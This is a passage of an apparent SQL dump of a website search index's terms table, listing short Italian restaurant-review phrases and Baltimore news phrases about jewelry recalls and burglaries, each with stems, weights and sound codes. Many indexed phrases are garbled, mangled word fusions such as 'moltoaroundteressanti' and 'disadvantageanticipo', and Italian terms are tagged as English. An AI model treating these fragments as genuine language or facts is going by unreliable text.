ica','molto batlli ica',0,1,1.5333,'M431342',1,'en'),(43284,'moltoaroundteressanti','moltoaroundteressanti',0,0,1,'M436536253',1,'en'),(43285,'moltoaroundteressanti il','moltoaroundteressanti il',0,1,1.8,'M4365362534',1,'en'),(43286,'moltoaroundteressanti il compilation','moltoaroundteressanti il compilation',0,1,2,'M4365362534251435',1,'en'),(43287,'monogrammate','monogramm',0,0,0.8,'M2653',1,'en'),(43288,'monogrammate il','monogramm il',0,1,1.5,'M26534',1,'en'),(43289,'monogrammate il cibo','monogramm il cibo',0,1,1.6667,'M2653421',1,'en'),(43290,'nations camino','nation camino',0,1,1.4667,'N3525',1,'en'),(43291,'nations camino spettacolare','nation camino spettacolare',0,1,1.9,'N3525213246',1,'en'),(43292,'navigation','navig',0,0,0.6667,'N1235',1,'en'),(43293,'navigation da','navig da',0,1,1.4333,'N12353',1,'en'),(43294,'navigation da ristorante','navig da ristorante',0,1,1.8,'N12353623653',1,'en'),(43295,'nazionalità','nazionalità',0,0,0.7333,'N2543',1,'en'),(43296,'nazionalità puòaccontentere','nazionalità puòaccontentere',0,1,1.9,'N25431253536',1,'en'),(43297,'nazionalità puòaccontentere ogni','nazionalità puòaccontentere ogni',0,1,2,'N2543125353625',1,'en'),(43298,'nelectronicl','nelectronicl',0,0,0.8,'N4236524',1,'en'),(43299,'nelectronicl giardino','nelectronicl giardino',0,1,1.7,'N42365242635',1,'en'),(43300,'nelectronicl giardino ci','nelectronicl giardino ci',0,1,1.8,'N423652426352',1,'en'),(43301,'nella elegante','nella elegante',0,1,1.4667,'N4253',1,'en'),(43302,'nella elegante blvd','nella elegante blvd',0,1,1.6333,'N42531413',1,'en'),(43303,'nella sala','nella sala',0,1,1.3333,'N424',1,'en'),(43304,'nella sala c\'é','nella sala c',0,1,1.4667,'N4242',1,'en'),(43305,'neoclassico','neoclassico',0,0,0.7333,'N242',1,'en'),(43306,'neoclassico e','neoclassico e',0,1,1.4333,'N242',1,'en'),(43307,'neoclassico e quadri','neoclassico e quadri',0,1,1.6667,'N24236',1,'en'),(43308,'newyorkese','newyorkes',0,0,0.6667,'N620',1,'en'),(43309,'newyorkese i','newyorkes i',0,1,1.4,'N620',1,'en'),(43310,'newyorkese i prezzi','newyorkes i prezzi',0,1,1.6333,'N62162',1,'en'),(43311,'no sono','no sono',0,1,1.2333,'N250',1,'en'),(43312,'no sono modesti','no sono modesti',0,1,1.5,'N25323',1,'en'),(43313,'non é certamente','non é certamente',0,1,1.5333,'N26353',1,'en'),(43314,'of us discreta','of us discreta',0,1,1.4667,'O123263',1,'en'),(43315,'of usas','of usas',0,1,1.2333,'O120',1,'en'),(43316,'of usas wellas','of usas wellas',0,1,1.4667,'O1242',1,'en'),(43317,'ogni esigenza','ogni esigenza',0,1,1.4333,'O25252',1,'en'),(43318,'ogni esigenza in','ogni esigenza in',0,1,1.5333,'O252525',1,'en'),(43319,'ombrelloni','ombrelloni',0,0,0.6667,'O51645',1,'en'),(43320,'ombrelloni bianchi','ombrelloni bianchi',0,1,1.6,'O51645152',1,'en'),(43321,'ombrelloni bianchi e','ombrelloni bianchi e',0,1,1.6667,'O51645152',1,'en'),(43322,'on line','on line',0,1,1.2333,'O545',1,'en'),(43323,'on line trading','on line trading',0,1,1.5,'O54536352',1,'en'),(43324,'on-line','on-lin',0,0,0.4667,'O545',1,'en'),(43325,'on-line trading','on-lin trading',0,1,1.5,'O54536352',1,'en'),(43326,'on-line trading system','on-lin trading system',0,1,1.7333,'O5453635235',1,'en'),(43327,'per finire','per finire',0,1,1.3333,'P6156',1,'en'),(43328,'per finire bravo','per finire bravo',0,1,1.5333,'P6156161',1,'en'),(43329,'personathe','personath',0,0,0.6667,'P6253',1,'en'),(43330,'personathe giovane','personath giovane',0,1,1.6,'P6253215',1,'en'),(43331,'personathe giovane eattento','personath giovane eattento',0,1,1.9,'P6253215353',1,'en'),(43332,'piuttosto','piuttosto',0,0,0.6,'P323',1,'en'),(43333,'piuttosto di','piuttosto di',0,1,1.4,'P323',1,'en'),(43334,'piuttosto di un','piuttosto di un',0,1,1.5,'P3235',1,'en'),(43335,'polo italia consiglio','polo italia consiglio',0,1,1.7,'P4342524',1,'en'),(43336,'pop','pop',0,0,0.2,'P000',1,'en'),(43337,'pop corn','pop corn',0,1,1.2667,'P265',1,'en'),(43338,'pop corn caramellati','pop corn caramellati',0,1,1.6667,'P26526543',1,'en'),(43339,'pranzo','pranzo',0,0,0.4,'P652',1,'en'),(43340,'pranzo ci','pranzo ci',0,1,1.3,'P652',1,'en'),(43341,'pranzo ci sono','pranzo ci sono',0,1,1.4667,'P6525',1,'en'),(43342,'premium','premium',0,0,0.4667,'P650',1,'en'),(43343,'premium coffee','premium coffee',0,1,1.4667,'P6521',1,'en'),(43344,'premium coffee con','premium coffee con',0,1,1.6,'P652125',1,'en'),(43345,'prenotare','prenotar',0,0,0.6,'P6536',1,'en'),(43346,'prenotare disadvantageanticipo','prenotar disadvantageanticipo',0,1,2,'P653632315325321',1,'en'),(43347,'prenotare disadvantageanticipo xchè','prenotar disadvantageanticipo xchè',0,1,2,'P6536323153253212',1,'en'),(43348,'presentato','presentato',0,0,0.6667,'P6253',1,'en'),(43349,'presentato con','presentato con',0,1,1.4667,'P625325',1,'en'),(43350,'presentato con quell\'eleganza','presentato con quell',0,1,1.9667,'P62532524252',1,'en'),(43351,'prezzi','prezzi',0,0,0.4,'P620',1,'en'),(43352,'prezzi no','prezzi no',0,1,1.3,'P625',1,'en'),(43353,'prezzi no sono','prezzi no sono',0,1,1.4667,'P62525',1,'en'),(43354,'produced in','produc in',0,1,1.3667,'P63235',1,'en'),(43355,'produced in usa','produc in usa',0,1,1.5,'P632352',1,'en'),(43356,'puòaccontentere','puòaccontenter',0,0,1,'P253536',1,'en'),(43357,'puòaccontentere ogni','puòaccontenter ogni',0,1,1.6667,'P25353625',1,'en'),(43358,'puòaccontentere ogni esigenza','puòaccontenter ogni esigenza',0,1,1.9667,'P25353625252',1,'en'),(43359,'quadri','quadri',0,0,0.4,'Q360',1,'en'),(43360,'quadri moltoaroundteressanti','quadri moltoaroundteressanti',0,1,1.9333,'Q365436536253',1,'en'),(43361,'quadri moltoaroundteressanti il','quadri moltoaroundteressanti il',0,1,2,'Q3654365362534',1,'en'),(43362,'quell\'eleganza','quell',0,0,0.9333,'Q4252',1,'en'),(43363,'quell\'eleganza che','quell che',0,1,1.6,'Q4252',1,'en'),(43364,'quell\'eleganza che sa','quell che sa',0,1,1.7,'Q4252',1,'en'),(43365,'racchiudere','racchiuder',0,0,0.7333,'R236',1,'en'),(43366,'racchiudere i','racchiuder i',0,1,1.4333,'R236',1,'en'),(43367,'racchiudere i diversi','racchiuder i diversi',0,1,1.7,'R2363162',1,'en'),(43368,'raffinate','raffin',0,0,0.6,'R153',1,'en'),(43369,'raffinate stoviglie','raffin stoviglie',0,1,1.6333,'R15323124',1,'en'),(43370,'raffinate stoviglie intonate','raffin stoviglie intonate',0,1,1.9333,'R153231245353',1,'en'),(43371,'raffinato','raffinato',0,0,0.6,'R153',1,'en'),(43372,'raffinato scam','raffinato scam',0,1,1.4667,'R15325',1,'en'),(43373,'raffinato scam i','raffinato scam i',0,1,1.5333,'R15325',1,'en'),(43374,'ralph lauren cucina','ralph lauren cucina',0,1,1.6333,'R4146525',1,'en'),(43375,'ristorante','ristorant',0,0,0.6667,'R23653',1,'en'),(43376,'ristorante di','ristorant di',0,1,1.4333,'R23653',1,'en'),(43377,'ristorante di classe','ristorant di classe',0,1,1.6667,'R23653242',1,'en'),(43378,'ristorante si','ristorant si',0,1,1.4333,'R236532',1,'en'),(43379,'ristorante si trova','ristorant si trova',0,1,1.6333,'R236532361',1,'en'),(43380,'rob laurent','rob laurent',0,1,1.3667,'R14653',1,'en'),(43381,'sa','sa',0,0,0.1333,'S000',1,'en'),(43382,'sa racchiudere','sa racchiudere',0,1,1.4667,'S6236',1,'en'),(43383,'sa racchiudere i','sa racchiudere i',0,1,1.5333,'S6236',1,'en'),(43384,'saint','saint',0,0,0.3333,'S530',1,'en'),(43385,'saint germain','saint germain',0,1,1.4333,'S53265',1,'en'),(43386,'saint germain è','saint germain è',0,1,1.5,'S53265',1,'en'),(43387,'sal','sal',0,0,0.2,'S400',1,'en'),(43388,'sal a.grande','sal a.grande',0,1,1.4,'S42653',1,'en'),(43389,'sal a.grande é','sal a.grande é',0,1,1.4667,'S42653',1,'en'),(43390,'sala','sala',0,0,0.2667,'S400',1,'en'),(43391,'sala c\'é','sala c',0,1,1.2667,'S420',1,'en'),(43392,'sala c\'é united','sala c united',0,1,1.5,'S4253',1,'en'),(43393,'scam i','scam i',0,1,1.2,'S500',1,'en'),(43394,'scam i suoi','scam i suoi',0,1,1.3667,'S520',1,'en'),(43395,'sedie','sedi',0,0,0.3333,'S300',1,'en'),(43396,'sedie in','sedi in',0,1,1.2667,'S350',1,'en'),(43397,'sedie in ferro','sedi in ferro',0,1,1.4667,'S3516',1,'en'),(43398,'sembrarealta','sembrarealta',0,0,0.8,'S51643',1,'en'),(43399,'sembrarealta cucina','sembrarealta cucina',0,1,1.6333,'S5164325',1,'en'),(43400,'sembrarealta cucina il','sembrarealta cucina il',0,1,1.7333,'S51643254',1,'en'),(43401,'si trova','si trova',0,1,1.2667,'S361',1,'en'),(43402,'si trova nella','si trova nella',0,1,1.4667,'S36154',1,'en'),(43403,'sono dicai','sono dicai',0,1,1.3333,'S532',1,'en'),(43404,'sono dicai divani','sono dicai divani',0,1,1.5667,'S532315',1,'en'),(43405,'sono modesti','sono modesti',0,1,1.4,'S5323',1,'en'),(43406,'sono modesti dovete','sono modesti dovete',0,1,1.6333,'S532313',1,'en'),(43407,'sono tavoliall\'apatrtoat','sono tavoliall',0,1,1.8,'S53141363',1,'en'),(43408,'sono tavoliall\'apatrtoat thelizabeth','sono tavoliall thelizabeth',0,1,2,'S531413634213',1,'en'),(43409,'spettacolare','spettacolar',0,0,0.8,'S13246',1,'en'),(43410,'spettacolare are','spettacolar are',0,1,1.5333,'S13246',1,'en'),(43411,'spettacolare are generally','spettacolar are generally',0,1,1.8667,'S132462564',1,'en'),(43412,'spettacolare lampadariall','spettacolar lampadariall',0,1,1.8333,'S13246451364',1,'en'),(43413,'spettacolare lampadariall the','spettacolar lampadariall the',0,1,1.9667,'S132464513643',1,'en'),(43414,'stile','stile',0,0,0.3333,'S340',1,'en'),(43415,'stile neoclassico','stile neoclassico',0,1,1.5667,'S345242',1,'en'),(43416,'stile neoclassico e','stile neoclassico e',0,1,1.6333,'S345242',1,'en'),(43417,'stile polo','stile polo',0,1,1.3333,'S3414',1,'en'),(43418,'stile polo ralph','stile polo ralph',0,1,1.5333,'S3414641',1,'en'),(43419,'stoviglie','stovigli',0,0,0.6,'S3124',1,'en'),(43420,'stoviglie intonate','stovigli intonate',0,1,1.6,'S31245353',1,'en'),(43421,'stoviglie intonate e','stovigli intonate e',0,1,1.6667,'S31245353',1,'en'),(43422,'suoi','suoi',0,0,0.2667,'S000',1,'en'),(43423,'suoi ombrelloni','suoi ombrelloni',0,1,1.5,'S51645',1,'en'),(43424,'suoi ombrelloni bianchi','suoi ombrelloni bianchi',0,1,1.7667,'S51645152',1,'en'),(43425,'system borsat','system borsat',0,1,1.4333,'S351623',1,'en'),(43426,'tavoliall\'apatrtoat','tavolial',0,0,1,'T141363',1,'en'),(43427,'tavoliall\'apatrtoat thelizabeth','tavolial thelizabeth',0,1,2,'T1413634213',1,'en'),(43428,'tavoliall\'apatrtoat thelizabeth vi','tavolial thelizabeth vi',0,1,2,'T14136342131',1,'en'),(43429,'the lingue','the lingue',0,1,1.3333,'T452',1,'en'),(43430,'the lingue buonall','the lingue buonall',0,1,1.6,'T452154',1,'en'),(43431,'the modo','the modo',0,1,1.2667,'T530',1,'en'),(43432,'the modo spettacolare','the modo spettacolare',0,1,1.7,'T53213246',1,'en'),(43433,'the raffinate','the raffinate',0,1,1.4333,'T6153',1,'en'),(43434,'the raffinate stoviglie','the raffinate stoviglie',0,1,1.7667,'T615323124',1,'en'),(43435,'the way through','the way through',0,1,1.5,'T620',1,'en'),(43436,'thelizabeth vi','thelizabeth vi',0,1,1.4667,'T42131',1,'en'),(43437,'thelizabeth vi ralph','thelizabeth vi ralph',0,1,1.6667,'T42131641',1,'en'),(43438,'through stile','through stile',0,1,1.4333,'T6234',1,'en'),(43439,'through stile neoclassico','through stile neoclassico',0,1,1.8333,'T62345242',1,'en'),(43440,'tipi','tipi',0,0,0.2667,'T100',1,'en'),(43441,'tipi di','tipi di',0,1,1.2333,'T130',1,'en'),(43442,'tipi di burger','tipi di burger',0,1,1.4667,'T131626',1,'en'),(43443,'trading system borsat','trade system borsat',0,1,1.7,'T6352351623',1,'en'),(43444,'trova','trova',0,0,0.3333,'T610',1,'en'),(43445,'trova nella','trova nella',0,1,1.3667,'T6154',1,'en'),(43446,'trova nella elegante','trova nella elegante',0,1,1.6667,'T6154253',1,'en'),(43447,'tutte the lingue','tutt the lingue',0,1,1.5333,'T452',1,'en'),(43448,'un bar','un bar',0,1,1.2,'U516',1,'en'),(43449,'un bar newyorkese','un bar newyorkese',0,1,1.5667,'U516562',1,'en'),(43450,'un navigation','un navigation',0,1,1.4333,'U51235',1,'en'),(43451,'un navigation da','un navigation da',0,1,1.5333,'U512353',1,'en'),(43452,'una lungaattesa','una lungaattesa',0,1,1.5,'U545232',1,'en'),(43453,'una lungaattesa a','una lungaattesa a',0,1,1.5667,'U545232',1,'en'),(43454,'united nations camino','unit nations camino',0,1,1.7,'U5353525',1,'en'),(43455,'us discreta','us discreta',0,1,1.3667,'U23263',1,'en'),(43456,'us discreta carta','us discreta carta',0,1,1.5667,'U23263263',1,'en'),(43457,'usa il','usa il',0,1,1.2,'U240',1,'en'),(43458,'usa il ristorante','usa il ristorante',0,1,1.5667,'U24623653',1,'en'),(43459,'usa in','usa in',0,1,1.2,'U250',1,'en'),(43460,'usa in stile','usa in stile',0,1,1.4,'U25234',1,'en'),(43461,'usas','usa',0,0,0.2667,'U200',1,'en'),(43462,'usas wellas','usa wellas',0,1,1.3667,'U242',1,'en'),(43463,'usas wellas dolcall','usa wellas dolcall',0,1,1.6333,'U2423424',1,'en'),(43464,'varie nazionalità','vari nazionalità',0,1,1.5667,'V652543',1,'en'),(43465,'varie nazionalità puòaccontentere','vari nazionalità puòaccontentere',0,1,2,'V6525431253536',1,'en'),(43466,'vi ralph','vi ralph',0,1,1.2667,'V641',1,'en'),(43467,'vi ralph lauren','vi ralph lauren',0,1,1.5,'V641465',1,'en'),(43468,'vini','vini',0,0,0.2667,'V500',1,'en'),(43469,'vini caffe\'','vini caffe',0,1,1.3667,'V521',1,'en'),(43470,'vini caffe\' premium','vini caffe premium',0,1,1.6333,'V52165',1,'en'),(43471,'way through','wai through',0,1,1.3667,'W362',1,'en'),(43472,'way through stile','wai through stile',0,1,1.5667,'W36234',1,'en'),(43473,'wellas','wella',0,0,0.4,'W420',1,'en'),(43474,'wellas dolcall','wella dolcall',0,1,1.4667,'W423424',1,'en'),(43475,'wellas dolcall of','wella dolcall of',0,1,1.5667,'W4234241',1,'en'),(43476,'xchè','xchè',0,0,0.2667,'X000',1,'en'),(43477,'xchè c\'è','xchè c',0,1,1.2667,'X000',1,'en'),(43478,'xchè c\'è una','xchè c una',0,1,1.4,'X500',1,'en'),(43479,'yrno','yrno',0,0,0.2667,'Y650',1,'en'),(43480,'yrno nelectronicl','yrno nelectronicl',0,1,1.5667,'Y654236524',1,'en'),(43481,'yrno nelectronicl giardino','yrno nelectronicl giardino',0,1,1.8667,'Y6542365242635',1,'en'),(44445,'11 andapril.14.safe','11 andapril.14.safe',0,1,1.6333,'A5316421',1,'en'),(44446,'11 andapril.14.safe pried','11 andapril.14.safe pried',0,1,1.8333,'A531642163',1,'en'),(44447,'119','119',0,0,0.3,'',1,'en'),(44448,'12 2010','12 2010',0,1,1.2333,'',1,'en'),(44449,'12 2010 federal','12 2010 federal',0,1,1.5,'F364',1,'en'),(44450,'13700','13700',0,0,0.5,'',1,'en'),(44451,'13700 inhibit','13700 inhibit',0,1,1.4333,'I513',1,'en'),(44452,'13700 inhibit coming','13700 inhibit coming',0,1,1.6667,'I513252',1,'en'),(44453,'1957','1957',0,0,0.4,'',1,'en'),(44454,'1957 park','1957 park',0,1,1.3,'P620',1,'en'),(44455,'1957 park school','1957 park school',0,1,1.5333,'P624',1,'en'),(44456,'2010','2010',0,0,0.4,'',3,'en'),(44457,'2010 federal','2010 federal',0,1,1.4,'F364',1,'en'),(44458,'2010 federal regulators','2010 federal regulators',0,1,1.7667,'F364624362',1,'en'),(44459,'2013 watch','2013 watch',0,1,1.3333,'W320',1,'en'),(44460,'2013 watch that','2013 watch that',0,1,1.5,'W323',1,'en'),(44461,'2013 young','2013 young',0,1,1.3333,'Y520',1,'en'),(44462,'2013 young world','2013 young world',0,1,1.5333,'Y52643',1,'en'),(44463,'22 2013','22 2013',0,1,1.2333,'',2,'en'),(44464,'22 2013 young','22 2013 young',0,1,1.4333,'Y520',1,'en'),(44465,'2401','2401',0,0,0.4,'',1,'en'),(44466,'2401 liberty','2401 liberty',0,1,1.4,'L163',1,'en'),(44467,'2401 liberty heights','2401 liberty heights',0,1,1.6667,'L163232',1,'en'),(44468,'25','25',0,0,0.2,'',2,'en'),(44469,'25 times','25 times',0,1,1.2667,'T520',1,'en'),(44470,'25 times the','25 times the',0,1,1.4,'T523',1,'en'),(44471,'28','28',0,0,0.2,'',1,'en'),(44472,'28 2013','28 2013',0,1,1.2333,'',1,'en'),(44473,'28 2013 watch','28 2013 watch',0,1,1.4333,'W320',1,'en'),(44474,'4618','4618',0,0,0.4,'',1,'en'),(44475,'4618 edmondson','4618 edmondson',0,1,1.4667,'E35325',1,'en'),(44476,'4618 edmondson ave','4618 edmondson ave',0,1,1.6,'E353251',1,'en'),(44477,'600','600',0,0,0.3,'',2,'en'),(44478,'600 parts','600 parts',0,1,1.3,'P632',1,'en'),(44479,'600 parts per','600 parts per',0,1,1.4333,'P63216',1,'en'),(44480,'74','74',0,0,0.2,'',1,'en'),(44481,'74 and','74 and',0,1,1.2,'A530',1,'en'),(44482,'a 1957','a 1957',0,1,1.2,'A000',1,'en'),(44483,'a 1957 park','a 1957 park',0,1,1.3667,'A162',1,'en'),(44484,'a baby','a baby',0,1,1.2,'A100',1,'en'),(44485,'a baby in','a baby in',0,1,1.3,'A150',1,'en'),(44486,'a fan','a fan',0,1,1.1667,'A150',1,'en'),(44487,'a fan they\'re','a fan they',0,1,1.4333,'A1536',1,'en'),(44488,'a high profile','a high profile',0,1,1.4667,'A21614',1,'en'),(44489,'a homemaker','a homemaker',0,1,1.3667,'A526',1,'en'),(44490,'a homemaker who','a homemaker who',0,1,1.5,'A526',1,'en'),(44491,'a rudolph','a rudolph',0,1,1.3,'A6341',1,'en'),(44492,'a rudolph of','a rudolph of',0,1,1.4,'A6341',1,'en'),(44493,'abigail','abigail',0,0,0.4667,'A124',1,'en'),(44494,'abigail eco-friendly','abigail eco-friendly',0,1,1.6667,'A124216534',1,'en'),(44495,'abigail eco-friendly may','abigail eco-friendly may',0,1,1.8,'A1242165345',1,'en'),(44496,'about jewelry','about jewelry',0,1,1.4333,'A13246',1,'en'),(44497,'about jewelry articles','about jewelry articles',0,1,1.7333,'A132463242',1,'en'),(44498,'about jewelry pretty','about jewelry pretty',0,1,1.6667,'A13246163',1,'en'),(44499,'agency','agenc',0,0,0.4,'A252',2,'en'),(44500,'agency presented','agenc presented',0,1,1.5333,'A25216253',1,'en'),(44501,'agency presented thursday','agenc presented thursday',0,1,1.8333,'A25216253623',1,'en'),(44502,'agency said','agenc said',0,1,1.3667,'A2523',1,'en'),(44503,'agency said lead','agenc said lead',0,1,1.5333,'A252343',1,'en'),(44504,'alerted','alert',0,0,0.4667,'A463',1,'en'),(44505,'alerted the','alert the',0,1,1.3667,'A463',1,'en'),(44506,'alerted the consumer','alert the consumer',0,1,1.6667,'A46325256',1,'en'),(44507,'ambrose','ambros',0,0,0.4667,'A5162',1,'en'),(44508,'ambrose together','ambros together',0,1,1.5333,'A51623236',1,'en'),(44509,'ambrose together with','ambros together with',0,1,1.7,'A516232363',1,'en'),(44510,'amount permitted','amount permitted',0,1,1.5333,'A531653',1,'en'),(44511,'amount permitted this','amount permitted this',0,1,1.7,'A5316532',1,'en'),(44512,'amount toxic','amount toxic',0,1,1.4,'A532',1,'en'),(44513,'amount toxic metal','amount toxic metal',0,1,1.6,'A532534',1,'en'),(44514,'an insurance','an insurance',0,1,1.4,'A52652',1,'en'),(44515,'an insurance professional','an insurance professional',0,1,1.8333,'A52652161254',1,'en'),(44516,'and bangles','and bangles',0,1,1.3667,'A5315242',1,'en'),(44517,'and bangles manufactured','and bangles manufactured',0,1,1.8,'A5315242512363',1,'en'),(44518,'and gums','and gums',0,1,1.2667,'A53252',1,'en'),(44519,'and gums when','and gums when',0,1,1.4333,'A532525',1,'en'),(44520,'and jewellery stolen','and jewellery stolen',0,1,1.6667,'A532462345',1,'en'),(44521,'and lead free','and lead free',0,1,1.4333,'A534316',1,'en'),(44522,'and thrown','and thrown',0,1,1.3333,'A5365',1,'en'),(44523,'and thrown away.11','and thrown away.11',0,1,1.6,'A5365',1,'en'),(44524,'and was a','and was a',0,1,1.3,'A532',1,'en'),(44525,'and was an','and was an',0,1,1.3333,'A5325',1,'en'),(44526,'andapril.14.safe','andapril.14.saf',0,0,1,'A5316421',1,'en'),(44527,'andapril.14.safe pried','andapril.14.saf pried',0,1,1.7333,'A531642163',1,'en'),(44528,'andapril.14.safe pried open','andapril.14.saf pried open',0,1,1.9,'A53164216315',1,'en'),(44529,'anklet','anklet',0,0,0.4,'A5243',1,'en'),(44530,'anklet chain','anklet chain',0,1,1.4,'A524325',1,'en'),(44531,'anklet chain sold','anklet chain sold',0,1,1.5667,'A524325243',1,'en'),(44532,'anklet stringed','anklet stringed',0,1,1.5,'A5243236523',1,'en'),(44533,'anklet stringed since','anklet stringed since',0,1,1.7,'A5243236523252',1,'en'),(44534,'approved bpa','approv bpa',0,1,1.4,'A16131',1,'en'),(44535,'approved bpa and','approv bpa and',0,1,1.5333,'A1613153',1,'en'),(44536,'april.18.cash','april.18.cash',0,0,0.8667,'A1642',1,'en'),(44537,'april.18.cash ripped','april.18.cash ripped',0,1,1.6667,'A1642613',1,'en'),(44538,'april.18.cash ripped off','april.18.cash ripped off',0,1,1.8,'A16426131',1,'en'),(44539,'are 25','ar 25',0,1,1.2,'A600',1,'en'),(44540,'are 25 times','ar 25 times',0,1,1.4,'A6352',1,'en'),(44541,'are recalling','ar recalling',0,1,1.4333,'A62452',1,'en'),(44542,'are recalling more','ar recalling more',0,1,1.6,'A6245256',1,'en'),(44543,'arizona','arizona',0,0,0.4667,'A625',1,'en'),(44544,'arizona manda','arizona manda',0,1,1.4333,'A6253',1,'en'),(44545,'arizona manda mill','arizona manda mill',0,1,1.6,'A625354',1,'en'),(44546,'arms','arm',0,0,0.2667,'A652',1,'en'),(44547,'arms but','arm but',0,1,1.2667,'A65213',1,'en'),(44548,'arms but with','arm but with',0,1,1.4333,'A65213',1,'en'),(44549,'arrived','arriv',0,0,0.4667,'A613',1,'en'),(44550,'arrived at','arriv at',0,1,1.3333,'A613',1,'en'),(44551,'arrived at the','arriv at the',0,1,1.4667,'A613',1,'en'),(44552,'articles about','articl about',0,1,1.4667,'A6324213',2,'en'),(44553,'articles about jewelry','articl about jewelry',0,1,1.7333,'A6324213246',1,'en'),(44554,'articles by','articl by',0,1,1.3667,'A632421',1,'en'),(44555,'articles by datebaltimore','articl by datebaltimore',0,1,1.8333,'A632421314356',1,'en'),(44556,'articles stolen','articl stolen',0,1,1.5,'A63242345',1,'en'),(44557,'articles stolen from','articl stolen from',0,1,1.6667,'A63242345165',1,'en'),(44558,'as follows','as follows',0,1,1.3333,'A2142',1,'en'),(44559,'as follows is','as follows is',0,1,1.4333,'A2142',1,'en'),(44560,'as most','as most',0,1,1.2333,'A2523',1,'en'),(44561,'as most teething','as most teething',0,1,1.5333,'A252352',1,'en'),(44562,'at 2401','at 2401',0,1,1.2333,'A300',1,'en'),(44563,'at 2401 liberty','at 2401 liberty',0,1,1.5,'A34163',1,'en'),(44564,'at 4618','at 4618',0,1,1.2333,'A300',1,'en'),(44565,'at 4618 edmondson','at 4618 edmondson',0,1,1.5667,'A35325',1,'en'),(44566,'at dollar','at dollar',0,1,1.3,'A346',1,'en'),(44567,'at dollar type','at dollar type',0,1,1.4667,'A34631',1,'en'),(44568,'at gilchrist','at gilchrist',0,1,1.4,'A3242623',1,'en'),(44569,'at gilchrist surgery','at gilchrist surgery',0,1,1.6667,'A32426232626',1,'en'),(44570,'at jh','at jh',0,1,1.1667,'A320',1,'en'),(44571,'at jh greenback','at jh greenback',0,1,1.5,'A326512',1,'en'),(44572,'at park','at park',0,1,1.2333,'A3162',1,'en'),(44573,'at park inn','at park inn',0,1,1.3667,'A31625',1,'en'),(44574,'at the robert','at the robert',0,1,1.4333,'A36163',1,'en'),(44575,'augusta','augusta',0,0,0.4667,'A230',1,'en'),(44576,'augusta reubens','augusta reubens',0,1,1.5,'A236152',1,'en'),(44577,'augusta reubens was','augusta reubens was',0,1,1.6333,'A236152',1,'en'),(44578,'aunt','aunt',0,0,0.2667,'A530',1,'en'),(44579,'aunt augusta','aunt augusta',0,1,1.4,'A5323',1,'en'),(44580,'aunt augusta reubens','aunt augusta reubens',0,1,1.6667,'A53236152',1,'en'),(44581,'ave both','av both',0,1,1.2667,'A130',1,'en'),(44582,'ave both were','av both were',0,1,1.4333,'A136',1,'en'),(44583,'ave has','av has',0,1,1.2333,'A120',1,'en'),(44584,'ave has been','av has been',0,1,1.4,'A1215',1,'en'),(44585,'avenue','avenu',0,0,0.4,'A150',1,'en'),(44586,'avenue has','avenu has',0,1,1.3333,'A152',1,'en'),(44587,'avenue has been','avenu has been',0,1,1.5,'A15215',1,'en'),(44588,'away from kids','awai from kids',0,1,1.4667,'A165232',1,'en'),(44589,'away they\'re','awai they',0,1,1.4,'A360',1,'en'),(44590,'away they\'re pendants','awai they pendants',0,1,1.7,'A36153532',1,'en'),(44591,'away.11','away.11',0,0,0.4667,'A000',1,'en'),(44592,'away.11 at','away.11 at',0,1,1.3333,'A300',1,'en'),(44593,'away.11 at gilchrist','away.11 at gilchrist',0,1,1.6667,'A3242623',1,'en'),(44594,'baby in','babi in',0,1,1.2333,'B500',1,'en'),(44595,'baby in your','babi in your',0,1,1.4,'B560',1,'en'),(44596,'baby\'s','babi',0,0,0.4,'B200',1,'en'),(44597,'baby\'s jewelry','babi jewelry',0,1,1.4667,'B246',1,'en'),(44598,'baby\'s jewelry recall','babi jewelry recall',0,1,1.7,'B24624',1,'en'),(44599,'back door','back door',0,1,1.3,'B236',1,'en'),(44600,'back door arizona','back door arizona',0,1,1.5667,'B23625',1,'en'),(44601,'baltimore based','baltimor based',0,1,1.5,'B4356123',1,'en'),(44602,'baltimore based mom','baltimor based mom',0,1,1.6333,'B43561235',1,'en'),(44603,'baltimore city','baltimor city',0,1,1.4667,'B435623',1,'en'),(44604,'baltimore city health','baltimor city health',0,1,1.7,'B43562343',1,'en'),(44605,'baltimore she','baltimor she',0,1,1.4333,'B43562',1,'en'),(44606,'baltimore she was','baltimor she was',0,1,1.5667,'B43562',1,'en'),(44607,'baltimore sun','baltimor sun',0,1,1.4333,'B435625',1,'en'),(44608,'baltimore sun don\'t','baltimor sun don',0,1,1.6333,'B435625353',1,'en'),(44609,'bangle','bangl',0,0,0.4,'B524',1,'en'),(44610,'bangle bracelet','bangl bracelet',0,1,1.5,'B52416243',1,'en'),(44611,'bangle bracelet are','bangl bracelet are',0,1,1.6333,'B524162436',1,'en'),(44612,'bangles','bangl',0,0,0.4667,'B5242',1,'en'),(44613,'bangles manufactured','bangl manufactured',0,1,1.6667,'B5242512363',1,'en'),(44614,'bangles manufactured from','bangl manufactured from',0,1,1.8333,'B5242512363165',1,'en'),(44615,'based mom','base mom',0,1,1.3,'B235',1,'en'),(44616,'based mom launched','base mom launched',0,1,1.6,'B2354523',1,'en'),(44617,'be taken','be taken',0,1,1.2667,'B325',1,'en'),(44618,'be taken away','be taken away',0,1,1.4333,'B325',1,'en'),(44619,'because of','becaus of',0,1,1.3333,'B210',1,'en'),(44620,'because of high','becaus of high',0,1,1.5,'B212',1,'en'),(44621,'bedroom','bedroom',0,0,0.4667,'B365',1,'en'),(44622,'bedroom ladder','bedroom ladder',0,1,1.4667,'B365436',1,'en'),(44623,'bedroom ladder stolen','bedroom ladder stolen',0,1,1.7,'B3654362345',1,'en'),(44624,'bedroom november.22.gate','bedroom november.22.gate',0,1,1.8,'B365151623',1,'en'),(44625,'bedroom november.22.gate kicked','bedroom november.22.gate kicked',0,1,2,'B36515162323',1,'en'),(44626,'been cited','been cited',0,1,1.3333,'B523',1,'en'),(44627,'been cited by','been cited by',0,1,1.4333,'B5231',1,'en'),(44628,'been cited for','been cited for',0,1,1.4667,'B52316',1,'en'),(44629,'belle','bell',0,0,0.3333,'B400',1,'en'),(44630,'belle isle','bell isle',0,1,1.3333,'B424',1,'en'),(44631,'belle isle taxicab','bell isle taxicab',0,1,1.6,'B424321',1,'en'),(44632,'ben','ben',0,0,0.2,'B500',1,'en'),(44633,'ben reubens','ben reubens',0,1,1.3667,'B56152',1,'en'),(44634,'ben reubens who','ben reubens who',0,1,1.5,'B56152',1,'en'),(44635,'bling','bling',0,0,0.3333,'B452',1,'en'),(44636,'bling the','bling the',0,1,1.3,'B4523',1,'en'),(44637,'bling the can','bling the can',0,1,1.4333,'B452325',1,'en'),(44638,'both were','both were',0,1,1.3,'B360',1,'en'),(44639,'both were found','both were 